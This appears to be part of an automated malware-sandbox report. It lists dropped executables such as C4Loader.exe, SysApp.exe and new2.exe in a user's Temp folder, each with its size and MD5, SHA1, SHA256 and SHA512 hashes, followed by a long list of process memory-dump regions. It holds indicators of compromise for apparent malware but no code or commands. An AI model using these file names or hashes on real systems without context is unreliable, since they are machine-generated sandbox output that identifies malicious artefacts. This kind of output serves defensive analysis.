64211cade48395dcdb033c661d01e8d4d770d8ab49cec7b90abf176d99fceb6e9c5c8bbef3e71df6565e9b9436e51a2561be55133062d11c636a747d256339cf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XBDFMUUB8A1PHYMP19CP.temp
Filesize
7KB

MD5
4e05f54d7e8f18debeb62cf4c85f6b80

SHA1
fdff131d40fdb012f63d1739efa7d99b6d81f50d

SHA256
a5f93f73fa8cee9cbe7a3232eb6f177caa4f3e9cceda0d9d478d35c5842615f6

SHA512
64211cade48395dcdb033c661d01e8d4d770d8ab49cec7b90abf176d99fceb6e9c5c8bbef3e71df6565e9b9436e51a2561be55133062d11c636a747d256339cf

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Local\Temp\C4Loader.exe
Filesize
1.4MB

MD5
bb86a343080f9f4696c250ef31a18d9d

SHA1
43b2193dcb1d56eac73ba88a7b461822074192d6

SHA256
095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

SHA512
24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

Download Submit
\Users\Admin\AppData\Local\Temp\C4Loader.exe
Filesize
1.4MB

MD5
bb86a343080f9f4696c250ef31a18d9d

SHA1
43b2193dcb1d56eac73ba88a7b461822074192d6

SHA256
095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

SHA512
24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

Download Submit
\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
Filesize
3.7MB

MD5
f5c51e7760315ad0f0238d268c03c60e

SHA1
85ebaaa9685634143a72bc82c6e7df87a78eed4c

SHA256
ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

SHA512
d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

Download Submit
\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
\Users\Admin\AppData\Local\Temp\SysApp.exe
Filesize
1.4MB

MD5
b6bbab9f72c88d07b484cc339c475e75

SHA1
f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

SHA256
dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

SHA512
1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

Download Submit
\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
3.0MB

MD5
50d48404f9b93a16c69aed2e6c585192

SHA1
3f949a4b96bac4f7e1cec881edb5b65295410a1c

SHA256
0a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789

SHA512
0e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774

Download Submit
\Users\Admin\AppData\Local\Temp\new2.exe
Filesize
3.0MB

MD5
50d48404f9b93a16c69aed2e6c585192

SHA1
3f949a4b96bac4f7e1cec881edb5b65295410a1c

SHA256
0a6ed49a01a7c4cad6ea914495d5789b97a9993508fe82ff3232613afb2a0789

SHA512
0e6616e1c537ca77e113184adf6aca8677c6d35d3415bccac5e22aa9735cd0be13ce837ee7583553d4db16700fd77973de711f7c24126a9be6d7525c86fc9774

Download Submit
memory/284-161-0x0000000019C40000-0x0000000019F22000-memory.dmp

Filesize
2.9MB

Download
memory/284-169-0x0000000077410000-0x00000000775B9000-memory.dmp

Filesize
1.7MB

Download
memory/284-176-0x00000000011C0000-0x0000000001240000-memory.dmp

Filesize
512KB

Download
memory/284-170-0x00000000772F0000-0x000000007740F000-memory.dmp

Filesize
1.1MB

Download
memory/284-168-0x0000000019AE0000-0x0000000019B06000-memory.dmp

Filesize
152KB

Download
memory/284-163-0x0000000000A00000-0x0000000000A08000-memory.dmp

Filesize
32KB

Download
memory/284-165-0x00000000011C0000-0x0000000001240000-memory.dmp

Filesize
512KB

Download
memory/284-164-0x00000000011C0000-0x0000000001240000-memory.dmp

Filesize
512KB

Download
memory/416-201-0x000007FEBD780000-0x000007FEBD790000-memory.dmp

Filesize
64KB

Download
memory/416-202-0x00000000007E0000-0x0000000000807000-memory.dmp

Filesize
156KB

Download
memory/416-197-0x00000000007B0000-0x00000000007D1000-memory.dmp

Filesize
132KB

Download
memory/416-196-0x00000000007B0000-0x00000000007D1000-memory.dmp

Filesize
132KB

Download
memory/416-203-0x0000000037450000-0x0000000037460000-memory.dmp

Filesize
64KB

Download
memory/416-199-0x00000000007E0000-0x0000000000807000-memory.dmp

Filesize
156KB

Download
memory/416-619-0x00000000007E0000-0x0000000000807000-memory.dmp

Filesize
156KB

Download
memory/540-178-0x00000000026D0000-0x0000000002750000-memory.dmp

Filesize
512KB

Download
memory/540-177-0x00000000026D0000-0x0000000002750000-memory.dmp

Filesize
512KB

Download
memory/540-179-0x00000000026DB000-0x0000000002712000-memory.dmp

Filesize
220KB

Download
memory/832-420-0x000000007EF10000-0x000000007EF20000-memory.dmp

Filesize
64KB

Download
memory/832-185-0x0000000002BA0000-0x0000000002BA2000-memory.dmp

Filesize
8KB

Download
memory/872-180-0x0000000000620000-0x0000000000626000-memory.dmp

Filesize
24KB

Download
memory/872-105-0x00000000022A0000-0x00000000023DD000-memory.dmp

Filesize
1.2MB

Download
memory/872-167-0x000000000E980000-0x000000000E9D7000-memory.dmp

Filesize
348KB

Download
memory/872-104-0x0000000001D90000-0x0000000002294000-memory.dmp

Filesize
5.0MB

Download
memory/976-190-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/976-191-0x0000000077410000-0x00000000775B9000-memory.dmp

Filesize
1.7MB

Download
memory/976-192-0x00000000772F0000-0x000000007740F000-memory.dmp

Filesize
1.1MB

Download
memory/976-193-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/976-188-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/980-160-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1236-128-0x0000000002250000-0x00000000022D0000-memory.dmp

Filesize
512KB

Download
memory/1236-129-0x0000000002250000-0x00000000022D0000-memory.dmp

Filesize
512KB

Download
memory/1236-130-0x0000000002250000-0x00000000022D0000-memory.dmp

Filesize
512KB

Download
memory/1236-138-0x000000000225B000-0x0000000002292000-memory.dmp

Filesize
220KB

Download
memory/1236-126-0x000000001AF80000-0x000000001B262000-memory.dmp

Filesize
2.9MB

Download
memory/1236-127-0x00000000022D0000-0x00000000022D8000-memory.dmp

Filesize
32KB

Download
memory/1248-159-0x000000013F0B0000-0x000000013F470000-memory.dmp

Filesize
3.8MB

Download
memory/1248-108-0x000000013F0B0000-0x000000013F470000-memory.dmp

Filesize
3.8MB

Download
memory/1248-151-0x000000013F0B0000-0x000000013F470000-memory.dmp

Filesize
3.8MB

Download
memory/1456-65-0x0000000002630000-0x0000000002670000-memory.dmp

Filesize
256KB

Download
memory/1456-66-0x0000000002630000-0x0000000002670000-memory.dmp

Filesize
256KB

Download
memory/1512-353-0x0000000000F70000-0x0000000000FB0000-memory.dmp

Filesize
256KB

Download
memory/1512-346-0x0000000000F70000-0x0000000000FB0000-memory.dmp

Filesize
256KB

Download
memory/1512-166-0x0000000000F70000-0x0000000000FB0000-memory.dmp

Filesize
256KB

Download
memory/1748-54-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/1748-62-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/1748-61-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/1748-59-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

Filesize
4KB

Download
memory/1748-55-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/1824-102-0x0000000004FE0000-0x000000000512E000-memory.dmp

Filesize
1.3MB

Download
memory/1824-152-0x0000000002180000-0x00000000021C0000-memory.dmp

Filesize
256KB

Download
memory/1824-140-0x0000000002180000-0x00000000021C0000-memory.dmp

Filesize
256KB

Download
memory/1824-107-0x0000000002180000-0x00000000021C0000-memory.dmp

Filesize
256KB

Download
memory/1824-106-0x0000000002180000-0x00000000021C0000-memory.dmp

Filesize
256KB

Download
memory/1824-103-0x00000000003F0000-0x0000000000404000-memory.dmp

Filesize
80KB

Download
memory/1824-101-0x00000000049B0000-0x0000000004B16000-memory.dmp

Filesize
1.4MB

Download
memory/1824-100-0x0000000002180000-0x00000000021C0000-memory.dmp

Filesize
256KB

Download
memory/1824-88-0x0000000000010000-0x000000000017C000-memory.dmp

Filesize
1.4MB

Download
memory/1880-206-0x0000000001D00000-0x0000000001E3D000-memory.dmp

Filesize
1.2MB

Download
memory/1880-205-0x0000000001E70000-0x0000000002374000-memory.dmp

Filesize
5.0MB

Download
memory/1880-880-0x00000000002D0000-0x00000000002D6000-memory.dmp

Filesize
24KB

Download
memory/1964-184-0x0000000002C10000-0x0000000002C20000-memory.dmp

Filesize
64KB

Download